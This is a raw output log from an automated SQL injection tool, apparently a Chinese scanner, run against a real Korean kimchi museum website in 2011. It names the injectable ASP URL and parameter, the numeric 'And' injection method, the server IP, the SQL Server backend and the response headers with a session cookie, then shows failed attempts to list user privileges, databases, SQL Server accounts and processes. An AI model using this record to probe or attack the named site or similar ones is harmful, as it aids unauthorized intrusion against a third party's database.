■漏洞信息:============================================================
 ・URL:http://www.kimchimuseum.co.kr/comm/cook/memorial_message_delete.asp?m_id=9&str1=&str2=&page=1&m_no=298&id=3770
 ・页面标题：辫摹冠拱包
 ・参数:m_id=9&str1=&str2=&page=1&m_no=298&id=3770
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:211.233.54.45
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 04 Apr 2011 07:07:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 16605
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQAQCSRTT=OGGLNKHCMEEOKNHHFLLDEEDC; path=/
Cache-control: private



■数据库信息:============================================================
批次获取基本信息失败，开始逐一获取……
 ・当前用户权限：
获取用户权限失败！

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
